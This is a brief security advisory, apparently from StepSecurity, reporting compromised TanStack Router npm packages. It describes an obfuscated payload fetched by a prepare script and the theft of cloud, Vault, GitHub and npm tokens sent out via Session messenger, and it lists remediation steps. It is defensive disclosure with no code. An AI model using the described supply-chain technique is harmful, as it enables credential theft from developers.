StepSecurity

At least five TanStack Router npm packages have been compromised with malicious payloads targeting credential theft. The affected versions contain a heavily obfuscated 2.3 MB script and a doctored package.json that pulls a payload via a GitHub cross-fork 'ghost commit' using a prepare script. The malware targets AWS instance/task-role credentials, HashiCorp Vault tokens, GitHub tokens, and npm tokens, exfiltrating them via Session messenger. Developers should immediately stop installing affected versions, audit recent installs since 2026-05-11 19:20 UTC, rotate all secrets on potentially compromised hosts, and hunt for outbound connections to filev2.getsession.org. StepSecurity detected the compromise through automated analysis of new npm releases.

TanStack npm Packages Compromised

<p>“The page you are looking for doesn’t exist or has been moved”</p>
<p>And here is the correct link: <a href="https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem" target="_blank" rel="noopener nofollow">https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem</a></p>
